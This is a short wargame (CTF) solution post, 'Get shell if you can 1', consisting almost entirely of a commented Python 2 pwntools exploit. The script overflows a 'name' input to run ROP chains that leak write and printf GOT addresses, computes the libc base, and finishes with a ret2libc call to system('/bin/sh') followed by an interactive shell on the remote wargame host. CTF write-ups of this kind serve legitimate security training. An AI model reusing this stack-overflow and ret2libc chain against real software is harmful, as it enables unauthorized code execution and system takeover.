[Wargame] CERTIS get shell if you can 1

Posted by MrBIN on January 14, 2017

Get shell if you can 1

  • rop 문제
from pwn import *
#context.log_level = 'debug'

# Walk-through of the author's solution: a stack overflow in the "name"
# input (the vulnerable code itself is not shown on this page) is used three
# times in a row — two ROP chains that leak GOT entries, then a ret2libc
# frame. Each stage relies on fixed binary addresses and a disclosed libc
# pointer; a stack canary or a length-checked read of the name field would
# be expected to stop every stage, and PIE would invalidate the constants
# below.

# Target session and the libc build used to resolve symbol offsets.
# NOTE(review): the file name mentions both "i386" and "amd64", while every
# address below is packed/unpacked as 32-bit (p32/u32) — confirm the offsets
# in this file match the libc actually loaded by the remote process.
s = remote("wargame.kimtae.xyz", 10016)
lib = ELF("./libc6-i386_2.23-0ubuntu5_amd64.so")

# Absolute addresses taken from the target binary. They are only meaningful
# if the binary is loaded at a fixed base (presumably built without PIE —
# not verifiable from this page).
main = 0x08048676
write_plt = 0x080484B0
write_got = 0x0804A024
printf_got = 0x0804A010

# Stage 1: overflow the "name" input to leak the GOT entry of write.
# 38 bytes of filler reach the saved return address (offset as given by the
# author; not derivable from this page). The frame that follows is:
#   saved return -> write@plt, with `main` as write's own return address so
#   the program restarts and can be overflowed again,
#   then write's arguments (fd=1, buf=write_got, len=4).
pay = "A" * 38
pay += p32(write_plt)
pay += p32(main)

pay += p32(1)
pay += p32(write_got)
pay += p32(4)

# Drive the three prompts; only the name field carries the payload. What the
# "size" and "Memo" values do server-side is not shown here.
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
s.sendline("1")
s.recvuntil("Enter Memo : ")
s.sendline("a")

# The 4 bytes emitted by the chain are the resolved runtime address of write.
data = u32(s.recv(4))

# Stage 2: identical chain, this time leaking printf's GOT entry.
pay = "A" * 38
pay += p32(write_plt)
pay += p32(main)

pay += p32(1)
pay += p32(printf_got)
pay += p32(4)
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
# NOTE(review): "size" is "0" here but "1" in stage 1; the page does not say
# whether the value matters.
s.sendline("0")
s.recvuntil("Enter Memo : ")
s.sendline("a")

# data1 is only printed; the libc base below is computed from `data` alone.
data1 = u32(s.recv(4))
# Python 2 print statements — this script does not run under Python 3 as is.
print "[+]write got : ", hex(data)
print "[+]printf got : ", hex(data1)

# Rebase: runtime write address minus write's offset in the libc file gives
# the libc load base; system and the first "/bin/sh" string are rebased from
# it. This is the step libc ASLR is meant to defeat — it only works because
# stage 1 disclosed a libc pointer.
libc_base = data - lib.symbols['write']
system = libc_base + lib.symbols['system']
binsh = libc_base + list(lib.search('/bin/sh'))[0]

print "[+]libc base address : ",hex(libc_base)
print "[+]system address : ",hex(system)
print "[+]/bin/sh address : ",hex(binsh)

# Stage 3: ret2libc frame — system as the overwritten return address, "BBBB"
# as system's (never used) return address, and the "/bin/sh" pointer as its
# single argument.
pay = "A" * 38
pay += p32(system)
pay += "BBBB"
pay += p32(binsh)

# Same prompt sequence as the leak stages.
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
s.sendline("0")
s.recvuntil("Enter Memo : ")
s.sendline("a")

# Hand the socket over to the terminal.
s.interactive()

img1